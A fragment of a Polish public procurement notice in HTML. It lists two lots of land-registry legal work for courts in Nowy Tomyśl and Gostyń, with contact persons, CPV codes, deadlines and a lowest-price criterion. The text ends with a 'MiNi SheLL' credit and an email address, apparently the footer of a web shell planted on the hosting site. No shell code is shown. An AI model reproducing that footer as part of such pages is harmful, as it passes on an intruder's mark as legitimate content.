<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie badania stanu prawnego KW i sporządzenie protokołu z tego badania dotyczącego działek zapisanych w KW nr 7871, obręb Boruja Kościelna oraz Boruja Nowa, gmina Nowy Tomyśl, oznaczone w ewidencji gruntów jako działki: nr 323 o pow. 1,57 ha, nr 2 o pow. 3,64 ha, nr 368/1 o pow. 1,9192 ha oraz 369/1 o pow. 0,8786 prowadzonej przez Sąd Rejonowy w Nowym Tomyślu z uwzględnieniem ustalenia nazwisk wszystkich właścicieli przed S.P., ustalenie nazwiska właściciela majątku, z którego nastąpiła ewentualna parcelacja po II wojnie światowej /w przypadku gdy miała ona miejsce/, podanie podstawy prawnej przejęcia w/w nieruchomości na S. P. od okresu powojennego do dnia przejęcia na S.P.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Anna Budzyńska tel. 61/8853212.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wykonanie wyciągu z wykazu zmian gruntowych w celu uregulowania działu I KW Nr 15988 prowadzonej przez SR w Gostyniu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie wyciągu z wykazu zmian gruntowych w celu uregulowania działu I księgi wieczystej nr 15988 prowadzonej przez Sąd Rejonowy w Gostyniu.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Zdzisław Krysztofiak tel. 65/5185564..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com